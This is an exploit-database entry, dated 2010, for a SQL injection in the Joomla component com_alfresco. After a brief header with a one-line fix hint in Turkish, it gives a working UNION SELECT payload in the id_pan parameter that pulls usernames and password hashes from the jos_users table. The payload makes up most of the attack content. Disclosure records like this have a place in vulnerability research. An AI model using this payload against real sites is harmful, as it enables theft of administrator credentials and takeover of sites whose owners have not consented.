Joomla! Component com_alfresco - SQL Injection



EKU-ID: 18386 CVE: OSVDB-ID:
Author: FL0RiX Published: 2010-01-03 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


<------------------- header data start ------------------- >

#############################################################
#  Joomla Component com_alfresco SQL Injection Vulnerability
#############################################################

# Author          : FL0RiX

# Name            : com_alfresco

# Greez           : PyskE,Dr.Kacak And All Friends

# Bug Type        : SQL Injection

# Infection       : Admin login bilgileri alinabilir.

# Demo Vuln.      :

http://server/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--

< -- bug code end of -- >